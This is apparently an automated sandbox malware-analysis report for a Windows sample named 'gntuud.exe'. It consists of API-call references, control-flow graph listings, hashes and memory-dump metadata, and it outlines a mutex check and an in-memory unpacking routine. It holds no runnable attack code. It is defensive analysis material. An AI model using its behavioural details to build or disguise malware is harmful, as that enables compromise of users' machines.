                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 0041D915
                                                                • _free.LIBCMT ref: 0041D926
                                                                • _free.LIBCMT ref: 0041D937
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 9b2601ed83b24476e775deb93b8458d54ddcb24acc698b66a9a1fc18dcbebf7a
                                                                • Instruction ID: 6025c10385c71f7bb96e721290e2dad06e9e38842dd47ad59e1a15c00094ce58
                                                                • Opcode Fuzzy Hash: 9b2601ed83b24476e775deb93b8458d54ddcb24acc698b66a9a1fc18dcbebf7a
                                                                • Instruction Fuzzy Hash: 06E09A75C806209BCA016F17BD559953BA1EB647943C2312AF95056232CB3905739ECE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\Desktop\file.exe
                                                                • API String ID: 0-1957095476
                                                                • Opcode ID: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
                                                                • Instruction ID: 9698455488551ced2192efa7f0ee548952e5698eb24d3f820b7e273d75b3104a
                                                                • Opcode Fuzzy Hash: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
                                                                • Instruction Fuzzy Hash: 0441A2B1E40214AFCB11DF9ADCC1AEFBBB8EB99314F10006BE50597251D7789E82CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00419FE2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 2118026453-2084237596
                                                                • Opcode ID: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
                                                                • Instruction ID: b55e6041155ecd8fb66803e6bd24d0423a012c2324726995748e47be6f979120
                                                                • Opcode Fuzzy Hash: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
                                                                • Instruction Fuzzy Hash: 3C416C72A00209EFCF15DF94CD81AEEBBB5FF48304F18805AF90467251D33999A0DB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00412DCE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileModuleName
                                                                • String ID: .$5120
                                                                • API String ID: 514040917-2446372808
                                                                • Opcode ID: 288dbf1ff717b3effbb29f942bdd3f648585338554576630b94e0c9c66201538
                                                                • Instruction ID: 028e71521c6590f82ff7af423b4cde0d22ea1461aa592c587eec63fda8d9010e
                                                                • Opcode Fuzzy Hash: 288dbf1ff717b3effbb29f942bdd3f648585338554576630b94e0c9c66201538
                                                                • Instruction Fuzzy Hash: 4621B2B09053589BDB14EF24C91A7DD7FB8AB06358F5001CEE44967282D7B89B498BE3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0041FED4: EnterCriticalSection.KERNEL32(004058A0,?,00424305,004058A0,00437D58,00000010,0041EAF1,00000000,C032C301,0000000F,0000000F,004058A0,?,0041BBFA,004058A0,0000000F), ref: 0041FEEF
                                                                • FlushFileBuffers.KERNEL32(00000000,00437D38,0000000C,00423B10,NA,?,00000001,?,0041EA4E,?), ref: 00423A52
                                                                • GetLastError.KERNEL32 ref: 00423A63
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                • String ID: NA
                                                                • API String ID: 4109680722-827283589
                                                                • Opcode ID: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
                                                                • Instruction ID: ff259a8a86f6791cd3d56539a9f5b8e5d03a9a6f044a9d5d94d641c3aaafe980
                                                                • Opcode Fuzzy Hash: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
                                                                • Instruction Fuzzy Hash: D601C072B002108FC710AFA9E84569E7BB1EF48725F50412FF4519B3E2DB7C9942CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:1.1%
                                                                Dynamic/Decrypted Code Coverage:35.4%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:212
                                                                Total number of Limit Nodes:16
                                                                execution_graph 24276 973694 70 API calls 3 library calls 24124 407845 60 API calls 24126 97049d 42 API calls 3 library calls 24278 407e4e 55 API calls 24127 420453 28 API calls 24279 966a87 89 API calls 24281 418655 73 API calls ___scrt_uninitialize_crt 24129 408457 49 API calls 23937 408660 23938 408676 23937->23938 23938->23937 23940 4086b2 CreateMutexW GetLastError 23938->23940 23993 417ac0 27 API calls 2 library calls 23938->23993 23941 40876d 23940->23941 23946 4086d8 23940->23946 23942 408774 23941->23942 23990 41badf 23941->23990 23995 41cd1c 25 API calls __wsopen_s 23942->23995 23944 408747 23994 418232 5 API calls ___raise_securityfailure 23944->23994 23946->23942 23946->23944 23949 408769 23996 41b97d 23990->23996 23993->23938 23994->23949 23997 41b98b 23996->23997 23998 41b99d 23996->23998 24024 418c69 GetModuleHandleW 23997->24024 24008 41b824 23998->24008 24002 41b990 24002->23998 24025 41ba23 GetModuleHandleExW 24002->24025 24003 41b9d6 24003->23942 24006 41b9e0 24009 41b830 CallCatchBlock 24008->24009 24031 41df83 EnterCriticalSection 24009->24031 24011 41b83a 24032 41b890 24011->24032 24013 41b847 24036 41b865 24013->24036 24016 41b9e1 24041 41dfe2 GetPEB 24016->24041 24019 41ba10 24022 41ba23 CallUnexpected 3 API calls 24019->24022 24020 41b9f0 GetPEB 24020->24019 24021 41ba00 GetCurrentProcess TerminateProcess 24020->24021 24021->24019 24023 41ba18 ExitProcess 24022->24023 24024->24002 24026 41ba42 GetProcAddress 24025->24026 24027 41ba65 24025->24027 24030 41ba57 24026->24030 24028 41b99c 24027->24028 24029 41ba6b FreeLibrary 24027->24029 24028->23998 24029->24028 24030->24027 24031->24011 24033 41b89c CallCatchBlock 24032->24033 24034 41b8fd CallUnexpected 24033->24034 24039 41d7f3 14 API calls CallUnexpected 24033->24039 24034->24013 24040 41dfcb LeaveCriticalSection 24036->24040 24038 41b853 24038->24003 24038->24016 24039->24034 24040->24038 24042 41b9eb 24041->24042 24043 41dffc 24041->24043 24042->24019 24042->24020 24045 41f378 5 API calls _unexpected 24043->24045 24045->24042 24136 9688bc 72 API calls ___scrt_uninitialize_crt 24287 9706ba 27 API calls 24288 404a70 29 API calls CatchGuardHandler 24139 41f473 6 API calls _unexpected 24292 41fe01 15 API calls _free 24145 955cc7 54 API calls 24146 401015 28 API calls 24147 41c014 60 API calls 2 library calls 24150 401020 30 API calls 24153 416820 111 API calls 24154 427430 15 API calls 24303 420236 43 API calls 3 library calls 24155 41f434 6 API calls _unexpected 24304 41f637 FreeLibrary 24156 971cec 18 API calls 3 library calls 24046 401ac0 24051 417040 24046->24051 24048 401ad1 24064 4186aa 28 API calls 24048->24064 24050 401adb 24053 417084 24051->24053 24054 41705e CatchIt 24051->24054 24052 41716e 24080 402180 27 API calls 2 library calls 24052->24080 24053->24052 24056 4170d8 24053->24056 24057 4170fd 24053->24057 24054->24048 24056->24052 24059 41843e 27 API calls 24056->24059 24061 4170e9 __wsopen_s 24057->24061 24065 41843e 24057->24065 24058 417178 24059->24061 24062 417150 24061->24062 24079 41cd1c 25 API calls __wsopen_s 24061->24079 24062->24048 24064->24050 24067 418443 24065->24067 24068 41845d 24067->24068 24070 41845f 24067->24070 24081 41cd6d 24067->24081 24090 41cd87 EnterCriticalSection LeaveCriticalSection _unexpected 24067->24090 24068->24061 24071 402180 Concurrency::cancel_current_task 24070->24071 24073 418469 24070->24073 24088 4194c4 RaiseException 24071->24088 24091 4194c4 RaiseException 24073->24091 24074 40219c 24089 419289 26 API calls 2 library calls 24074->24089 24077 418966 24078 4021c3 24078->24061 24080->24058 24086 41eb6a _unexpected 24081->24086 24082 41eba8 24093 41c830 14 API calls __dosmaperr 24082->24093 24083 41eb93 RtlAllocateHeap 24085 41eba6 24083->24085 24083->24086 24085->24067 24086->24082 24086->24083 24092 41cd87 EnterCriticalSection LeaveCriticalSection _unexpected 24086->24092 24088->24074 24089->24078 24090->24067 24091->24077 24092->24086 24093->24085 24163 956817 55 API calls CatchGuardHandler 24164 427cc0 20 API calls __startOneArgErrorHandling 24310 970213 18 API calls 3 library calls 24311 971611 42 API calls CatchGuardHandler 23909 950005 23914 95092b GetPEB 23909->23914 23911 950030 23916 95003c 23911->23916 23915 950972 23914->23915 23915->23911 23917 950049 23916->23917 23931 950e0f SetErrorMode SetErrorMode 23917->23931 23922 950265 23923 9502ce VirtualProtect 23922->23923 23925 95030b 23923->23925 23924 950439 VirtualFree 23929 9505f4 LoadLibraryA 23924->23929 23930 9504be 23924->23930 23925->23924 23926 9504e3 LoadLibraryA 23926->23930 23928 9508c7 23929->23928 23930->23926 23930->23929 23932 950223 23931->23932 23933 950d90 23932->23933 23934 950dad 23933->23934 23935 950dbb GetPEB 23934->23935 23936 950238 VirtualAlloc 23934->23936 23935->23936 23936->23922 24168 41e4df 88 API calls __wsopen_s 24314 402ae0 42 API calls 24174 4184e4 11 API calls ___scrt_uninitialize_crt 24320 96f63e 6 API calls 24176 954827 58 API calls CatchGuardHandler 24323 41caf8 40 API calls 24179 405880 68 API calls 24328 40ae81 52 API calls CatchGuardHandler 24182 954457 44 API calls 2 library calls 24094 421a85 GetEnvironmentStringsW 24097 421a9c 24094->24097 24105 421af2 24094->24105 24095 421b02 24096 421afb FreeEnvironmentStringsW 24096->24095 24106 4219a1 24097->24106 24099 421ab5 24099->24105 24109 41eb6a 24099->24109 24102 421add 24116 41e681 14 API calls __dosmaperr 24102->24116 24103 4219a1 __wsopen_s WideCharToMultiByte 24103->24102 24105->24095 24105->24096 24107 4219ba WideCharToMultiByte 24106->24107 24107->24099 24110 41eba8 24109->24110 24114 41eb78 _unexpected 24109->24114 24118 41c830 14 API calls __dosmaperr 24110->24118 24111 41eb93 RtlAllocateHeap 24113 41eba6 24111->24113 24111->24114 24113->24102 24113->24103 24114->24110 24114->24111 24117 41cd87 EnterCriticalSection LeaveCriticalSection _unexpected 24114->24117 24116->24105 24117->24114 24118->24113 24186 952447 25 API calls ___std_exception_copy 24330 420a99 44 API calls 3 library calls 24335 96c27b 58 API calls 2 library calls 24198 4060b0 28 API calls CatchGuardHandler 24201 4080b8 53 API calls 24336 41bab9 37 API calls 5 library calls 24202 418cb8 47 API calls _unexpected 24203 970068 15 API calls _free 24339 404740 28 API calls CatchGuardHandler 24209 418940 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24343 41df42 7 API calls __wsopen_s 24344 40b749 5 API calls CatchGuardHandler 24346 966b87 75 API calls 24347 954b87 57 API calls CatchGuardHandler 24349 969380 49 API calls 2 library calls 24355 418364 5 API calls ___report_securityfailure 24356 41cf68 51 API calls 3 library calls 24216 41b170 RtlUnwind 24217 40797a 59 API calls 24358 9733ac 70 API calls 3 library calls 24218 96e1a9 7 API calls 24360 402700 27 API calls 24367 421b09 45 API calls 6 library calls 24223 402110 14 API calls ___std_exception_destroy 24227 419119 50 API calls 2 library calls 24228 96d1cf 44 API calls 3 library calls 24229 407d19 56 API calls 24230 41851d 4 API calls 3 library calls 24237 9735ff CreateFileW 24374 408b30 25 API calls CatchGuardHandler 24375 406f30 61 API calls 2 library calls 24240 4045c0 30 API calls 24243 956117 55 API calls CatchGuardHandler 24381 955b17 26 API calls 24382 956317 57 API calls CatchGuardHandler 24244 968911 27 API calls 24384 968f1f 46 API calls _unexpected 24246 970d00 43 API calls 3 library calls 24247 4021e0 26 API calls ___std_exception_copy 24394 96ff35 37 API calls 3 library calls 24395 407be4 57 API calls 24252 4081ed 52 API calls 24253 4041f0 49 API calls 2 library calls 24255 96bd20 36 API calls 5 library calls 24396 426bf5 41 API calls 3 library calls 24260 96d555 24 API calls 4 library calls 24401 407f83 54 API calls 24261 97015e 15 API calls __dosmaperr 24262 96cd5f 39 API calls 24263 96bd46 23 API calls IsInExceptionSpec 24402 96e746 40 API calls __wsopen_s 24404 96874b 11 API calls ___scrt_uninitialize_crt 24410 952377 14 API calls ___std_exception_destroy 24414 4063b0 29 API calls CatchGuardHandler 24270 4195b0 6 API calls 3 library calls
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7d2803523c5be3f1a3d33093ed18ab668b5497d02f51594895b22345df41966
                                                                • Instruction ID: 22fe206b34a867f9c0c4be84b5a89d407671101fea83816f4ebb55b4962a653a
                                                                • Opcode Fuzzy Hash: a7d2803523c5be3f1a3d33093ed18ab668b5497d02f51594895b22345df41966
                                                                • Instruction Fuzzy Hash: 36920870E042089BEB14DFA8CA497DEBBB1EF45314F64426ED410773C2D7795A84CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 692 41b9e1-41b9ee call 41dfe2 695 41ba10-41ba1c call 41ba23 ExitProcess 692->695 696 41b9f0-41b9fe GetPEB 692->696 696->695 697 41ba00-41ba0a GetCurrentProcess TerminateProcess 696->697 697->695
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(0041F030,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA03
                                                                • TerminateProcess.KERNEL32(00000000,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA0A
                                                                • ExitProcess.KERNEL32 ref: 0041BA1C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
                                                                • Instruction ID: be758b5f3a38b2d93a3fbedb321d5b13915e36e10b2adafe3a414c7c05e9fbd7
                                                                • Opcode Fuzzy Hash: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
                                                                • Instruction Fuzzy Hash: 3BE0B631240108EFCB216F55DC49AA97B79FF45785FD4443AF80696231CB39EDA2CB88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 452 408660-408674 453 408693-40869f call 417ac0 452->453 454 408676-408691 452->454 455 4086a4-4086ab 453->455 454->455 457 4086b2-4086d2 CreateMutexW GetLastError 455->457 458 4086ad-4086b0 455->458 459 4086d8-4086de 457->459 460 40876d 457->460 458->452 463 4086e0-4086f2 459->463 464 40870e-408728 459->464 461 408774-4087be call 41cd1c call 406bc0 call 4065b0 460->461 462 40876f call 41badf 460->462 482 4087c3-4087c7 461->482 462->461 468 408704-40870b call 4186bf 463->468 469 4086f4-408702 463->469 465 408751-408764 call 418232 464->465 466 40872a-408735 464->466 476 408769-40876c 465->476 470 408747-40874e call 4186bf 466->470 471 408737-408745 466->471 468->464 469->461 469->468 470->465 471->461 471->470 483 4087c9 482->483 484 4087cb-4087d8 SetCurrentDirectoryA 482->484 483->484 485 408806-4088d0 call 416b80 call 402c70 call 416b80 call 402c70 call 416b80 call 402c70 call 417290 call 417190 call 417290 call 417470 call 417190 call 404920 484->485 486 4087da-4087e6 484->486 536 4088d5-4088de 485->536 487 4087e8-4087f6 486->487 488 4087fc-408803 call 4186bf 486->488 487->488 490 408b20 call 41cd1c 487->490 488->485 496 408b25 call 41cd1c 490->496 500 408b2a-408d95 call 41cd1c 496->500 515 408d97-408da3 500->515 516 408dbf-408ddc call 418232 500->516 519 408db5-408dbc call 4186bf 515->519 520 408da5-408db3 515->520 519->516 520->519 523 408de7-408def call 41cd1c 520->523 537 4088e0-4088ec 536->537 538 40890c-408924 536->538 539 408902-408909 call 4186bf 537->539 540 4088ee-4088fc 537->540 541 408952-40896a 538->541 542 408926-408932 538->542 539->538 540->496 540->539 546 40899b-4089b9 541->546 547 40896c-40897b 541->547 544 408934-408942 542->544 545 408948-40894f call 4186bf 542->545 544->496 544->545 545->541 548 4089ea-408a0e 546->548 549 4089bb-4089ca 546->549 552 408991-408998 call 4186bf 547->552 553 40897d-40898b 547->553 556 408a10-408a1f 548->556 557 408a3f-408a60 548->557 554 4089e0-4089e7 call 4186bf 549->554 555 4089cc-4089da 549->555 552->546 553->496 553->552 554->548 555->496 555->554 561 408a21-408a2f 556->561 562 408a35-408a3c call 4186bf 556->562 563 408a62-408a6e 557->563 564 408a8e-408aa9 557->564 561->496 561->562 562->557 570 408a70-408a7e 563->570 571 408a84-408a8b call 4186bf 563->571 566 408ad6-408adc 564->566 567 408aab-408aba 564->567 575 408b06-408b1f call 418232 566->575 576 408ade-408aea 566->576 573 408acc-408ad3 call 4186bf 567->573 574 408abc-408aca 567->574 570->496 570->571 571->564 573->566 574->496 574->573 580 408afc-408b03 call 4186bf 576->580 581 408aec-408afa 576->581 580->575 581->500 581->580
                                                                APIs
                                                                • CreateMutexW.KERNELBASE(00000000,00000000,?,0043A194,2F6E538A,?,00000000), ref: 004086C1
                                                                • GetLastError.KERNEL32(?,00000000), ref: 004086C7
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID:
                                                                • API String ID: 1925916568-0
                                                                • Opcode ID: 677416b2f065be909e1e34d9aa7e4e0e066a09f22e3cab73e9ee7cbfcd29be6c
                                                                • Instruction ID: 1164324652f938c6e56d746a4d3e88ffcf299d9f4c3b2ffeb6d467404e5c52bb
                                                                • Opcode Fuzzy Hash: 677416b2f065be909e1e34d9aa7e4e0e066a09f22e3cab73e9ee7cbfcd29be6c
                                                                • Instruction Fuzzy Hash: FD224771A001089BEB18DB64CE89BDDBB71EF85304F60413EF445BB2D2DB399A80CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 587 95003c-950047 588 95004c-950263 call 950a3f call 950e0f call 950d90 VirtualAlloc 587->588 589 950049 587->589 604 950265-950289 call 950a69 588->604 605 95028b-950292 588->605 589->588 610 9502ce-9503c2 VirtualProtect call 950cce call 950ce7 604->610 607 9502a1-9502b0 605->607 609 9502b2-9502cc 607->609 607->610 609->607 616 9503d1-9503e0 610->616 617 9503e2-950437 call 950ce7 616->617 618 950439-9504b8 VirtualFree 616->618 617->616 620 9505f4-9505fe 618->620 621 9504be-9504cd 618->621 624 950604-95060d 620->624 625 95077f-950789 620->625 623 9504d3-9504dd 621->623 623->620 629 9504e3-950505 LoadLibraryA 623->629 624->625 630 950613-950637 624->630 627 9507a6-9507b0 625->627 628 95078b-9507a3 625->628 631 9507b6-9507cb 627->631 632 95086e-9508be LoadLibraryA 627->632 628->627 633 950517-950520 629->633 634 950507-950515 629->634 635 95063e-950648 630->635 636 9507d2-9507d5 631->636 640 9508c7-9508f9 632->640 637 950526-950547 633->637 634->637 635->625 638 95064e-95065a 635->638 641 950824-950833 636->641 642 9507d7-9507e0 636->642 643 95054d-950550 637->643 638->625 639 950660-95066a 638->639 646 95067a-950689 639->646 648 950902-95091d 640->648 649 9508fb-950901 640->649 647 950839-95083c 641->647 650 9507e4-950822 642->650 651 9507e2 642->651 644 950556-95056b 643->644 645 9505e0-9505ef 643->645 652 95056d 644->652 653 95056f-95057a 644->653 645->623 654 950750-95077a 646->654 655 95068f-9506b2 646->655 647->632 656 95083e-950847 647->656 649->648 650->636 651->641 652->645 657 95057c-950599 653->657 658 95059b-9505bb 653->658 654->635 659 9506b4-9506ed 655->659 660 9506ef-9506fc 655->660 661 950849 656->661 662 95084b-95086c 656->662 670 9505bd-9505db 657->670 658->670 659->660 664 9506fe-950748 660->664 665 95074b 660->665 661->632 662->647 664->665 665->646 670->643
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0095024D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: cess$kernel32.dll
                                                                • API String ID: 4275171209-1230238691
                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                • Instruction ID: 3011bf755f7646c36f5d90342c8d2cb30f539888ed39e4fcd6c210434b9454ab
                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                • Instruction Fuzzy Hash: 69527974A002299FDB64CF59C985BA8BBB1BF49305F1480D9E94DAB251DB30AE89DF10
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 671 421a85-421a9a GetEnvironmentStringsW 672 421af5 671->672 673 421a9c-421abd call 421a4e call 4219a1 671->673 674 421af7-421af9 672->674 673->672 681 421abf-421ac0 call 41eb6a 673->681 676 421b02-421b08 674->676 677 421afb-421afc FreeEnvironmentStringsW 674->677 677->676 683 421ac5-421aca 681->683 684 421aea 683->684 685 421acc-421ae2 call 4219a1 683->685 686 421aec-421af3 call 41e681 684->686 685->684 690 421ae4-421ae8 685->690 686->674 690->686
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00421A8E
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00421AFC
                                                                  • Part of subcall function 004219A1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00425B70,?,00000000,00000000), ref: 00421A43
                                                                  • Part of subcall function 0041EB6A: RtlAllocateHeap.NTDLL(00000000,?,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041EB9C
                                                                • _free.LIBCMT ref: 00421AED
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                • String ID:
                                                                • API String ID: 2560199156-0
                                                                • Opcode ID: 1e2a4a0efd09f98f7f36030a6a4cef51275da8dbd300a357c5b071d00ade26cc
                                                                • Instruction ID: 88290d06a301cf730bedd20d0fc3159d199ef7429d3ebe9dce97fa7c701557d6
                                                                • Opcode Fuzzy Hash: 1e2a4a0efd09f98f7f36030a6a4cef51275da8dbd300a357c5b071d00ade26cc
                                                                • Instruction Fuzzy Hash: 6601FCA2B022717B273155B72CC9C7B596DCDD2B64395013BFD00C2211FDA98C03C179
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 717 950e0f-950e24 SetErrorMode * 2 718 950e26 717->718 719 950e2b-950e2c 717->719 718->719
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00000400,?,?,00950223,?,?), ref: 00950E19
                                                                • SetErrorMode.KERNELBASE(00000000,?,?,00950223,?,?), ref: 00950E1E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                • Instruction ID: 93ffa48b423e2448172ef2a8d6249573cbbb65ae7c140b352c25c32cb519ab2f
                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                • Instruction Fuzzy Hash: 10D0123114512877D7002A95DC09BCD7B1CDF05B63F108411FB0DD9080C770994047E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 720 417040-41705c 721 417084-41708a 720->721 722 41705e-417063 720->722 723 417090-41709b 721->723 724 41716e call 417c10 721->724 725 417065 722->725 726 417067-417081 call 41abf0 722->726 727 4170a4-4170b1 723->727 728 41709d-4170a2 723->728 734 417173-417178 call 402180 724->734 725->726 732 4170b3-4170b8 727->732 733 4170ba-4170bf 727->733 731 4170c2-4170d6 728->731 737 4170d8-4170dd 731->737 738 4170fd-4170ff 731->738 732->731 733->731 737->734 740 4170e3-4170f0 call 41843e 737->740 741 417101-417102 call 41843e 738->741 742 41710c 738->742 750 4170f2-4170fb 740->750 751 417169 call 41cd1c 740->751 748 417107-41710a 741->748 743 41710e-417131 call 41b2b0 742->743 752 417133-41713e 743->752 753 41715c-417166 743->753 748->743 750->743 751->724 755 417140-41714e 752->755 756 417152-417159 call 4186bf 752->756 755->751 757 417150 755->757 756->753 757->756
                                                                APIs
                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00417173
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Concurrency::cancel_current_task
                                                                • String ID:
                                                                • API String ID: 118556049-0
                                                                • Opcode ID: 3b5b23c5fa6689e84e77140b6718f819b8b7c5b1361dddae77b329bb3301316b
